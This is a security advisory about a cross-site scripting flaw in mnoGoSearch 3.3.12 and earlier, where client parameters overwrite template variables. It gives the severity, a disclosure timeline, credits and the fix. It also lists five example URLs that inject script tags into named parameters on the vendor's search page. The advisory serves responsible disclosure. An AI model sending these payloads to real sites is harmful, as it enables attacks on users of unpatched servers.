PT-2013-18: Variables Overwriting in mnoGoSearch Vulnerable softwaremnoGoSearch Version: 3.3.12 and earlierApplication link: http://www.mnogosearch.org/Severity levelSeverity level: Medium Impact: Cross-Site Scripting (XSS) Access Vector: Remote CVSS v2: Base Score: 4.3 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)CVE: not assigned Software descriptionmnoGoSearch is a universal Intranet and Internet search engine.Vulnerability descriptionPositive Technologies experts have detected a Cross-Site Scripting vulnerability in mnoGoSearch.Due to incorrect application architecture, all the template variables and variables sent by the client are stored in the same list. This vulnerability allows attackers to overwrite any uninitialized variables used in the template. Overwriting parameters, which are displayed on the web page without processing, results in multiple cross-site scripting vulnerabilities. Exploitation example http://www.mnogosearch.org/search/index.html?q=x&STORED=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=x&CL=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=a&cc=1&Charset=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=a&ResultContentType=text/html%0A%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=aaa&total=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&a=aHow to fixUpdate your software up to the latest version.Advisory status15.02.2013 - Vendor gets vulnerability details 01.03.2013 - Vendor releases fixed version and details 05.03.2013 - Public disclosureCreditsThe vulnerabilities has discovered by Sergey Bobrov, Positive Research Center (Positive Technologies Company)Referenceshttp://en.securitylab.ru/lab/PT-2013-18 http://www.mnogosearch.org/bugs/index.php?id=4819 Reports on the vulnerabilities previously discovered by Positive Research:http://ptsecurity.com/research/advisory/ http://en.securitylab.ru/lab/